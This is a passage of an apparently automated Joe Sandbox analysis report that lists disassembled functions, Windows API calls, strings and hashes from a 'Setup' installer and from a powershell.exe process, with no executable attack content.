Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

..., xrefs: 00406293
%02x%c, xrefs: 00406270

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Section: "%s", xrefs: 00405079
Skipping section: "%s", xrefs: 004050B5

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: powershell.exePID: 6008, Parent PID: 2316COMMON

Executed Functions

Function 07911798 Relevance: 14.6, Strings: 11, Instructions: 837COMMON

Download Yara Rule

Strings

4']q, xrefs: 07911999
4']q, xrefs: 07911DB0
$]q, xrefs: 079117DC
4']q, xrefs: 07911F00
4']q, xrefs: 079119A5
tP]q, xrefs: 07911821
$]q, xrefs: 079117AA
4']q, xrefs: 07911DA6
tP]q, xrefs: 07911815
$]q, xrefs: 079117D0
4']q, xrefs: 07911F0A

Memory Dump Source

Source File: 00000011.00000002.2959694036.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-308583777
Opcode ID: 525c0250b14d7e126990f35698514bda03d818498b722a052795a0e963da0eaf
Instruction ID: 0680fc7f67d6095bb5cae1cf8b0dbe5434e64ab0aca8caae2c51fa2cceeae58c
Opcode Fuzzy Hash: 525c0250b14d7e126990f35698514bda03d818498b722a052795a0e963da0eaf
Instruction Fuzzy Hash: E0528CB178431DAFC7259B68984077ABBFAEFC1318F1484BAD645CB251DB31C861C7A2

Function 033950E8 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2952179964.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3390000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d853481ecb6ff8ce5b22ec98450341ce26d4793226b17b51fd07ca65391bd7
Instruction ID: fe5bd539b94181afe2ac8d9888177d64fbe6b5d616ba1436af4138a1d98e039f
Opcode Fuzzy Hash: 37d853481ecb6ff8ce5b22ec98450341ce26d4793226b17b51fd07ca65391bd7
Instruction Fuzzy Hash: 0D423D74A01209DFDB05CF98C984AAEFBB6FF49310F24855AE855AB365C731ED81CB90

Function 03394900 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2952179964.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3390000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac249b1e9e3b348f06cea767238129e4c72457354b67762119f7e57674ef1158
Instruction ID: 8a007550bb05c0e5dd70d8debe344d97549d844eddcb88bc480df6cb5c6d29fe
Opcode Fuzzy Hash: ac249b1e9e3b348f06cea767238129e4c72457354b67762119f7e57674ef1158
Instruction Fuzzy Hash: 08D14834E05249DFDB05CFA9D590A9DFBF6AF49310F288196E804AB362C731ED46CB94

Function 07911A54 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2959694036.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7910000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d596336dd4710d90d4593e41cf2b89753019af7a30a89cb5eb9786d7c3b95695
Instruction ID: 421949b1423c4de1d0d12ded5f95f5ab72136e091cf1c4f7a566b8edbea604da
Opcode Fuzzy Hash: d596336dd4710d90d4593e41cf2b89753019af7a30a89cb5eb9786d7c3b95695
Instruction Fuzzy Hash: 2B41F6F1B9020EEBDB24CF248581B7A7BAAAF8134CF1484A5D6049B255EB35D861C7A1

Function 033933F0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2952179964.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3390000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f09037e428f28f90072612149574bd0a2294a2355628c45970d769debd9d577d
Instruction ID: c88a8edb8e0cec1e2ec055d694cf28bb4b6dafa46d5331f50032901df88aabe5
Opcode Fuzzy Hash: f09037e428f28f90072612149574bd0a2294a2355628c45970d769debd9d577d
Instruction Fuzzy Hash: 15413DB4900505DFDB0ACF59C5D49AAFBB1FF48310B15819AD805AB365C731FD90CB90

Function 03393400 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2952179964.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3390000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c723e5891bb8daba12d831e7d25d2eeaf075f596ef84d161bcc74d3b26f3e0
Instruction ID: 5848750b655db88c3e4577d94b7423721b51fef7d953dea8fd60d1a36cb8dd38
Opcode Fuzzy Hash: 29c723e5891bb8daba12d831e7d25d2eeaf075f596ef84d161bcc74d3b26f3e0
Instruction Fuzzy Hash: F94109B8A00505DFDB0ACF59C5D8AAAF7B5FF48320B15855AD905AB364C732FD90CBA0

Function 03392AB0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2952179964.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3390000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d676a98c8c1b1836aa33086af8d1132fb90ea38546706b4ec4ebfa73b01f59
Instruction ID: 79bb991776d06694ddc1861ed86891d72d2c1256101d215f6752bcee83b3c3b4
Opcode Fuzzy Hash: 28d676a98c8c1b1836aa33086af8d1132fb90ea38546706b4ec4ebfa73b01f59
Instruction Fuzzy Hash: FA211974A04609DFCB01CF99C980AAAFBF5FF49310B148596D809EB361C735EC51CBA0

Function 033948F1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2952179964.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3390000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca54dc88309d33253278c2fc786a5e1d45a0d0d79ee38b8b09de162dc4444f88
Instruction ID: 9122220eb096554a1b99691f06ecdb6012af8f833f858e827408bcc231952521
